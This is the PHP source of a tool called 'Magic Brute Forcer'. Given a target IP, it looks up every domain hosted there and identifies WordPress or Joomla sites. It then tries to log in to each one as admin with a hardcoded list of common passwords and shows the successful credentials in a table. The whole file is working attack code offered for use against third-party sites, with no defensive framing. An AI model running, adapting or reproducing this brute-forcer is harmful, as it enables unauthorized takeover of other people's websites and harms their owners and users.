Magic Brute Forcer

1. <?
2. ini_set("display_errors", "0");
3. set_time_limit(0);
4.  
5. echo'<html>';
6. echo'<title>Magic Brute Forcer BY Team-ECF</title>';
7. echo"<body bgcolor='black'>";
8. echo'<center>';
9. echo"<font color='red' face='courier new'>";
10. echo'<h1><b>[Magic Brute Forcer]</b></h1>';
11. echo'<FORM action=""  method="post">';
12. echo'<input type="hidden" name="form_action" value="1">';
13. echo'<table border=1>';
14. echo'<tr><td><font color="green" face="courier new">Target IP</font></td><td><input type="text" size="60" style="background-color: black; color: red; font-size: 15px; font-family: courier new;" name="url" value=""></td></tr>';
15. echo'</table>';
16. echo"<br>";
17. echo'<INPUT class=submit type="submit" value="[SUBMIT]" style="background-color: black; color: blue; font-size: 20px; font-family: courier new; name="Submit">';
18. echo'</FORM>';
19. echo'</font>';
20. echo'</center>';
21. echo'</body>';
22. echo'</html>';
23.  
24. if (array_key_exists('form_action', $_POST)){
25.  
26. echo ("<br>") ;
27. $site=$_POST['url'];
28.  
29.  
30. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
31. $sameip=('http://bgp.he.net/ip/'.$site.'#_dns');
32. $ch = curl_init();
33. curl_setopt($ch, CURLOPT_URL, $sameip);
34. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
35. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
36. curl_setopt($ch, CURLOPT_HEADER, 0);
37. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
38. $revip = curl_exec($ch);
39.  
40.  
41.  
42. //The following A records are set to
43.  
44.  
45. $pos = strpos($revip,'The following A records are set to ');
46. if ($pos===false){
47. }
48. else {
49. $list1=explode('The following A records are set to',$revip);
50. $list=explode('title',$list1[1]);
51. $count=count($list);
52. $i='1';
53. echo ("<center><table border=1 cellspacing=1 cellpading=1>  
54. <tr><th width='400'><font color='red' face='courier new'>SITE NAME</font>
55. </th><th width=200><font color='red' face='courier new'>CMS</font></th>
56. <th width=150><font color='red' face='courier new'>USERNAME</font></td>
57. <th width=150><font color='red' face='courier new'>PASSWORD</font></td>
58. <th width=100><font color='red' face='courier new'>STATUS</font></td></tr>");
59.  
60. for ($i=1 ; $i <= ($count) ; $i++) {
61.  
62. $domain=entre2v2($list[$i],'="','">');
63. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
64. $urltowp='http://'.$domain.'/wp-login.php';
65. $ch = curl_init();
66. curl_setopt($ch, CURLOPT_URL, $urltowp);
67. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
68. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
69. curl_setopt($ch, CURLOPT_HEADER, 0);
70. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
71. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
72. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
73. $buffer = curl_exec($ch);
74. $pos = strpos($buffer,'<body class="login">');
75. if ($pos === false){
76. $urltowp='http://'.$domain.'/administrator/';
77. $ch = curl_init();
78. curl_setopt($ch, CURLOPT_URL, $urltowp);
79. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
80. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
81. curl_setopt($ch, CURLOPT_HEADER, 0);
82. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
83. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
84. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
85. $buffer = curl_exec($ch);
86. $pos = strpos($buffer,'Joomla!');
87. if ($pos===false){
88. echo "<center><table border=1 cellspacing=1 cellpading=1>  
89. <tr><td width='400'><font color='white' face='courier new' > $domain </font></td>
90. <td width=200><font color='white' face='courier new' > OTHER </font></td>
91. <td width=150><font color='white' face='courier new'> ----------<font></td>
92. <td width=150><font color='white' face='courier new'> ----------</font></td>
93. <td width=100><font color='white' face='courier new'> CANCELLED </font>
94. </td></tr></table></center>";
95. }
96. else {
97. echo "<center><table border=1 cellspacing=1 cellpading=1>  
98. <tr><td width='400'><font color='yellow' face='courier new' > $domain </font></td>
99. <td width=200><font color='yellow' face='courier new' > JOOMLA </font></td>
100. <td width=150><font color='yellow' face='courier new'> ------------<font></td>
101. <td width=150><font color='yellow' face='courier new'> ------------</font></td>
102. <td width=100><font color='yellow' face='courier new'> RUNNING </font>
103. </td></tr></table></center>";
104.  
105. $a=('admin admin123 123456 12345 12345678 pass 123456789 password admin_123 123@123 1');
106. $passwords=explode(" ",$a);
107. $co=randomt();
108. //joomla part
109. foreach ( $passwords as $password) {
110. $urlto='http://'.$domain.'/administrator';
111. $ch = curl_init();
112. curl_setopt($ch, CURLOPT_URL, $urlto);
113. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
114. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
115. curl_setopt($ch, CURLOPT_HEADER, 1);
116. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
117. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
118. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
119. $buffer = curl_exec($ch);
120.  
121. $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
122. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
123.  
124. $ch = curl_init();
125. curl_setopt($ch, CURLOPT_URL, $urlto);
126. curl_setopt($ch, CURLOPT_POST, 1);
127. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=".$password."&option=com_login&task=login&return=".$return."&".$hidden."=1");
128. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
129. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
130. curl_setopt($ch, CURLOPT_HEADER, 0);
131. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
132. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
133. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
134. $buffer = curl_exec($ch);
135. $pos = strpos($buffer,"com_config");
136. if($pos === false) {
137.  
138. }
139. else {
140. echo "<center><table border=1 cellspacing=1 cellpading=1>  
141. <tr><td width='400'><font color='green' face='courier new' > $domain </font></td>
142. <td width=200><font color='green' face='courier new' > JOOMLA </font></td>
143. <td width=150><font color='green' face='courier new'> administrator<font></td>
144. <td width=150><font color='green' face='courier new'> $password</font></td>
145. <td width=100><font color='white' face='courier new' style='background-color: green;'> SUCCESS </font>
146. </td></tr></table></center>";
147.  
148. }
149. }
150. }
151. }
152. else {
153. echo "<center><table border=1 cellspacing=1 cellpading=1>  
154. <tr><td width='400'><font color='blue' face='courier new' > $domain </font></td>
155. <td width=200><font color='blue' face='courier new' > WORDPRESS </font></td>
156. <td width=150><font color='blue' face='courier new'> ------------<font></td>
157. <td width=150><font color='blue' face='courier new'> ------------</font></td>
158. <td width=100><font color='blue' face='courier new'> RUNNING </font>
159. </td></tr></table></center>";
160. $a=('admin admin123 123456 12345 12345678 pass 123456789 password admin_123 123@123 1');
161. $passwords=explode(" ",$a);
162. foreach ( $passwords as $password) {
163. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
164. $url2=$urltowp;
165. $ch = curl_init();
166. curl_setopt($ch, CURLOPT_URL, $urltowp);
167. curl_setopt($ch, CURLOPT_POST, 1);
168. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=".$password."&rememberme=forever&wp-submit=Log In&testcookie=1");
169. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
170. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
171. curl_setopt($ch, CURLOPT_HEADER, 0);
172. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
173. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
174. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
175. $buffer = curl_exec($ch);
176. $pos=strpos($buffer,'theme-editor.php');
177. if ($pos === false){
178. }
179. else {
180. echo "<center><table border=1 cellspacing=1 cellpading=1>  
181. <tr><td width='400'><font color='green' face='courier new' > $domain </font></td>
182. <td width=200><font color='green' face='courier new' > WORDPRESS </font></td>
183. <td width=150><font color='green' face='courier new'> admin<font></td>
184. <td width=150><font color='green' face='courier new'> $password</font></td>
185. <td width=100><font color='white' face='courier new' style='background-color: green;'> SUCCESS </font>
186. </td></tr></table></center>";
187.  
188. }
189. }
190.  
191.  
192. }
193.  
194. }
195.  
196. }
197. }
198. echo'<center>';
199. echo"<font face='courier new' color='red'>";
200. echo'<h2>[coded by Legion Hunter]</h2>';
201. echo'<h4>[nadimzobaer@gmail.com]</h4>';
202. echo'</font>';
203. echo'</center>';
204.  
205. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
206.     $ar0=explode($marqueurDebutLien, $text);
207.     $ar1=explode($marqueurFinLien, $ar0[$i]);
208.     return trim($ar1[0]);
209.  
210. }
211. function randomt() {
212.  
213.     $chars = "abcdefghijkmnopqrstuvwxyz023456789";
214.     srand((double)microtime()*1000000);
215.     $i = 0;
216.     $pass = '' ;
217.  
218.     while ($i <= 7) {
219.         $num = rand() % 33;
220.         $tmp = substr($chars, $num, 1);
221.         $pass = $pass . $tmp;
222.         $i++;
223.     }
224.  
225.     return $pass;
226.  
227. }
228.  
229. ?>